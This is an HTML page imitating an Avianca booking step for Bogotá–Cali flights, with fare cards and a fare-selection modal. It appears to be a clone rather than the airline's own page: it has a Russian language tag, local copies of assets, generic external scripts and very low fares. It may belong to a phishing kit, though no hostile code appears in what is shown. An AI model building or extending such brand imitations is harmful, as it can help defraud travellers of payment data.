<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avianca - Booking</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="shortcut icon" href="./assets/favicon.png" t  ype="image/x-icon">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/flight.css">
    <link rel="stylesheet" href="./css/normalize.css">

    <!-- START -->
    <script src="./js/functions.js"></script>
</head>
<body class="mvh-100 bg-gray sb2-hidden">
    <!-- ON LOADER -->
    <div class="loader show">
        <img class="" src="./assets/svg/plane-loader.gif">
    </div>


    <header>
        <div class="details--container">
            <div class="details">
                <img src="./assets/logos/avianca_red.svg">
                <h4 id="origin-code">BOG</h4>
                <img src="./assets/svg/arrow.png" width="14px">
                <h4 id="destination-code">CLI</h4>
                <span>|</span>
                <p id="flight-date">Dic 22</p>
                <span>|</span>
                <img id="btn-edit-flight" src="./assets/svg/pen.png" width="18px">
            </div>
        </div>
    </header>

    
    <main>
        <div class="filter-container">
            <div class="mt-4">
                <p id="flight-label-1" class="fs-4">Selecciona tu vuelo de regreso - Vie, Dic 22</p>
                <h4 id="flight-label-2" clasS="fs-2">Bogotá a Cali</h4>
            </div>
            <img src="./assets/svg/filter.svg">
        </div>

        <div class="mt-2 card-schedule">
            <h5 id="flight-label-3"class="m-0 fs-4">Vie, Dic 22</h5>
            <h6 class="m-0 mt-2 fs-6">Desde <span id="flight-price-0">49.999 COP</span></h6>
        </div>
        
        <div id="flight-cards">
            <div onclick="loadFlight('flight_1')" class="card-departure mt-2">
                <div class="best-price-label">
                    <p>Mejor precio</p>
                </div>
                <p class="fs-5 text-center mt-3"> Directo • 1h 15m • AV 8908</p>
                <div class="card-departure-distance">
                    <h4>08:25</h4>
                    <hr>
                    <h4>09:40</h4>
                </div>
                <p class="fs-6 mt-2">Incluye trayecto operado por Avianca</p>
                <h4 class="text-end mt-1">$<span id="flight-price-1">49.999 COP</span></h4>
            </div>
    
            <div onclick="loadFlight('flight_2')" class="card-departure mt-2">
                <p class="fs-5 text-center mt-2"> Directo • 1h 15m • AV 8904 </p>
                <div class="card-departure-distance">
                    <h4>11:20</h4>
                    <hr>
                    <h4>12:35</h4>
                </div>
                <p class="fs-6 mt-2">Incluye trayecto operado por Avianca</p>
                <h4 class="text-end mt-1">$<span id="flight-price-2">63.900 COP</span></h4>
            </div>
    
            <div onclick="loadFlight('flight_3')" class="card-departure mt-2">
                <p class="fs-5 text-center mt-2"> Directo • 1h 15m • AV 8704</p>
                <div class="card-departure-distance">
                    <h4>18:45</h4>
                    <hr>
                    <h4>20:00</h4>
                </div>
                <p class="fs-6 mt-2">Incluye trayecto operado por Avianca</p>
                <h4 class="text-end mt-1">$<span id="flight-price-3">78.900 COP</span></h4>
            </div>
        </div>

        <div class="conditions mt-3">
            <div>
                <img src="./assets/svg/dot_menu.png" width="25px" style="margin-right: 10px;">
                <p style="float: right; margin-top: 3px;">Condiciones tarifarias</p>
            </div>
            
            <img src="./assets/svg/down_arrow.png" width="15px">
        </div>

    </main>
 
    <div class="modal mt-10" id="modal-select-ticket">
        <div class="modal-header">
            <img id="modal-close-ticket" src="./assets/svg/left-arrow.png" width="14px">
            <p>Selecciona tu tarifa</p>
        </div>
        <div class="ticket-label">
            <p>ECONÓMICA</p>
        </div>

        <div class="modal-body">

            <div class="ct-item mb-2">
                <img src="./assets/svg/info_icon.png" width="18px">
                <p>Los vuelos sujetos a promociones no podrán escoger su asiento.</p>
            </div>

            <div class="card-container xs">
                <div class="card-ticket">
                    <h2 class="card-ticket-type">XS</h2>
                    <p class="card-ticket-label">Más económica</p>
                    <div class="card-ticket-items">
                        <div class="ct-item">
                            <img src="./assets/svg/personalItemLowest-XS.svg" width="18px">
                            <p>1 artículo personal (bolso) (debe caber bajo el asiento)</p>
                        </div>
                        <div class="ct-item" style="text-decoration: underline;">
                            <img src="./assets/svg/icon-alert-denied.svg" width="18px">
                            <p>Restricciones de la tarifa</p>
                        </div>
                    </div>
                </div>
                <div class="card-ticket-header" onclick="nextStep('xs')">
                    <h6 class="fs-3">$<span id="xs"></span></h6>
                    <p class="fs-5">Precio por pasajero</p>
                </div>
            </div>


            <div class="card-container s">
                <div class="card-ticket">
                    <h2 class="card-ticket-type">S</h2>
                    <p class="card-ticket-label">Viaje ligero</p>
                    <div class="card-ticket-items">
                        <div class="ct-item">
                            <img src="./assets/svg/carryOnBaggage-S.svg" width="18px">
                            <p>1 equipaje de mano (10 kg) + bolso</p>
                        </div>
                        <div class="ct-item">
                            <img src="./assets/svg/mileageAcrual-S.svg" width="18px">
                            <p>Acumula LifeMiles</p>
                        </div>
                        <div class="ct-item" style="text-decoration: underline;">
                            <img src="./assets/svg/icon-alert-denied.svg" width="18px">
                            <p>Restricciones de la tarifa</p>
                        </div>
                    </div>
                </div>
                <div class="card-ticket-header" onclick="nextStep('s')">
                    <h6 class="fs-3">$<span id="s"></span></h6>
                    <p class="fs-5">Precio por pasajero</p>
                </div>
            </div>


            <div class="card-container m">
                <div class="card-ticket">
                    <h2 class="card-ticket-type">M</h2>
                    <p class="card-ticket-label">Más confort</p>
                    <div class="card-ticket-items">
                        <div class="ct-item">
                            <img src="./assets/svg/carryOnBaggage-M.svg" width="18px">
                            <p>1 equipaje de mano (10 kg) + bolso</p>
                        </div>
                        <div class="ct-item">
                            <img src="./assets/svg/mileageAcrual-M.svg" width="18px">
                            <p>Acumula LifeMiles</p>
                        </div>
                        <div class="ct-item">
                            <img src="./assets/svg/baggageAllowance-M.svg" width="18px">
                            <p>1 equipaje de bodega (23 kg)</p>
                        </div>
                        <div class="ct-item">
                            <img src="./assets/svg/airportCheckin-M.svg" width="18px">
                            <p>Check-in gratis en aeropuerto</p>
                        </div>
                        <div class="ct-item">
                            <img src="./assets/svg/standardSeat-M.svg" width="18px">
                            <p>Asiento Economy</p>
                        </div>
                        <div class="ct-item" style="text-decoration: underline;">
                            <img src="./assets/svg/icon-alert-denied.svg" width="18px">
                            <p>Restricciones de la tarifa</p>
                        </div>
                    </div>
                </div>
                <div class="card-ticket-header" onclick="nextStep('m')">
                    <h6 class="fs-3">$<span id="m"></span></h6>
                    <p class="fs-5">Precio por pasajero</p>
                </div>
            </div>


        </div>
    </div>

    <footer class="footer-fixed">
        <p>© Avianca S.A 2023</p>
    </footer>
    <!-- SCRIPTS -->
    <script src="./js/flight-detail-back.js"></script>
</body>
</html>